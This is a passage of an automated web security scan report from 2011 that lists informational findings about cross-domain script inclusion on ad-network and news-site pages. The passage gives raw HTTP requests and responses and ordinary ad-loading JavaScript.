http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2617542&PluID=0&e=0&w=300&h=250&ord=2108699877&ncu=$$http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/2108699877/x15/USNetwork/BCN2011010850_001_Toshiba/ToshibaTabletMomentum_300.html/726348573830336e374e674144526a62?http://$$&ucm=true

Request

Response

16.12. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15

Issue detail

The response dynamically includes the following script from another domain:

http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2789858&PluID=0&w=300&h=250&ord=1946055127&ncu=$$http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/1946055127/x15/USNetwork/BCN2011060011_003_MotoAtrix/Moto_CPC_300.html/726348573830336e374e674144526a62?http://$$&ucm=true

Request

Response

16.13. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/17412-120572-6712-5?mpt=409125085&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/409125085/x15/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_300x250_DC.html/726348573830336e374e674144526a62?

Request

Response

16.14. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15

Issue detail

The response dynamically includes the following script from another domain:

http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2789858&PluID=0&w=300&h=250&ord=1117403339&ncu=$$http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/1117403339/x15/USNetwork/BCN2011060011_003_MotoAtrix/Moto_CPC_300.html/726348573830336e374e674144526a62?http://$$&ucm=true

Request

Response

16.15. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15

Issue detail

The response dynamically includes the following script from another domain:

http://adsfac.us/ag.asp?cc=QTS036.298273.0&source=js&ord=1163288537

Request

Response

16.16. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1873985195@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1873985195@x15

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.7;abr=!ie;sz=300x250;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/1610492232/x15/USNetwork/BCN2011050712_002_HP/HP_ron_300x250.html/726348573830336e374e674144526a62?;ord=1610492232?

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1873985195@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308244185674&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P5018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:09:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1605
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 17:10:44 GMT;path=/;httponly

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.7;sz=300x250;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/161
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.7;abr=!ie;sz=300x250;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/1610492232/x15/USNetwork/BCN2011050712_002_HP/HP_ron_300x250.html/726348573830336e374e674144526a62?;ord=1610492232?">\n');
document.write ('</SCRIPT>
...[SNIP]...

16.17. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15

Issue detail

The response dynamically includes the following script from another domain:

http://adsfac.us/ag.asp?cc=QTS036.298273.0&source=js&ord=1282000926

Request

Response

16.18. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1046746257@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1046746257@Top1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.8;abr=!ie;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/108701616/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=108701616?

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1046746257@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308244184265&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P5018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:09:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1589
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 17:10:44 GMT;path=/;httponly

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/10870
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.8;abr=!ie;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/108701616/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=108701616?">\n');
document.write ('</SCRIPT>
...[SNIP]...

16.19. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/17412-120572-6712-0?mpt=1984547796&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1984547796/Top1/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_728x90_DC.html/726348573830336e374e674144526a62?

Request

Response

16.20. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1

Issue detail

The response dynamically includes the following script from another domain:

http://adsfac.us/ag.asp?cc=QTS036.298272.0&source=js&ord=510990017

Request

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1103
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 09:39:52 GMT;path=/;httponly

document.write ('<script type="text/javascript" language="javascript">\n');
document.write ('var fd_clk = ');
document.write ("'");
document.write ('http://network.realmedia.com/RealMedia/ads/click_lx
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" language="javascript" src="http://adsfac.us/ag.asp?cc=QTS036.298272.0&source=js&ord=510990017"></script>
...[SNIP]...

16.21. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1

Issue detail

The response dynamically includes the following script from another domain:

http://altfarm.mediaplex.com/ad/js/17985-125897-6712-46?mpt=835797786&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62?

Request

Response

16.22. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1397195672@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1397195672@Top1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.8;abr=!ie;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/215682172/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=215682172?

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1397195672@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308243871331&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P5018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:04:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1589
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 17:05:31 GMT;path=/;httponly

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/21568
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.8;abr=!ie;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/215682172/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=215682172?">\n');
document.write ('</SCRIPT>
...[SNIP]...

16.23. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1

Issue detail

The response dynamically includes the following script from another domain:

http://adsfac.us/ag.asp?cc=QTS036.298272.0&source=js&ord=2040463675

Request

Response

16.24. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1520590272@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1520590272@Top1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.8;abr=!ie;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540?

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1520590272@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018HS|O2018RL|O2018UF|O1018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:02:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1589
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 07:51:19 GMT;path=/;httponly

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/47323
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.8;abr=!ie;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540?">\n');
document.write ('</SCRIPT>
...[SNIP]...

16.25. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1737549536@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1737549536@Top1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.4;abr=!ie;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978?

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1737549536@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018HS|O2018RL|O2018UF

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:52:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1584
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 07:40:58 GMT;path=/;httponly

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/11991
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5823.RealMedia/B5598690.4;abr=!ie;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978?">\n');
document.write ('</SCRIPT>
...[SNIP]...

16.26. http://online.wsj.com/home-page previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/home-page

Issue detail

The response dynamically includes the following script from another domain:

http://adsyndication.msn.com/delivery/getads.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:24:07 GMT
Server: Apache/2.0.58 (Unix)
Cache-Control: no-cache, no-store
FastDynaPage-ServerInfo: sbkj2kapachep09 - Thu 06/16/11 - 07:23:27 EDT
Cache-Control: max-age=15
Expires: Thu, 16 Jun 2011 11:24:22 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 159431
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000993430/cstr=33615280=_4dfa54c7,4721737206,768033^993430^1183^0,1_/xsxdata=$xsxdata/bnum=33615280/optn=64?trg=;ord=4721737206?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.993430.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:08:55 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601
Date: Thu, 16 Jun 2011 19:08:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: 33615280=_4dfa54c7,4721737206,768033^993430^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000993430/cstr=33615280=_4dfa54c7,4721737206,768033^993430^1183^0,1_/xsxdata=$xsxdata/bnum=33615280/optn=64?trg=;ord=4721737206?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ebay.adnxs.com/ttj?id=472679&cb=2003200856&pt1=0000768033&pt2=0001004438&pt3=1183&imp_id=v2:I:1308248221:2003200856:0000768033:0001004438:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001004438/cstr=43472790=_4dfa489d,2003200856,768033^1004438^1183^0,1_/xsxdata=$XSXDATA/bnum=43472790/optn=64?trg=

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1004438.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:17:01 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 641
Date: Thu, 16 Jun 2011 18:17:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
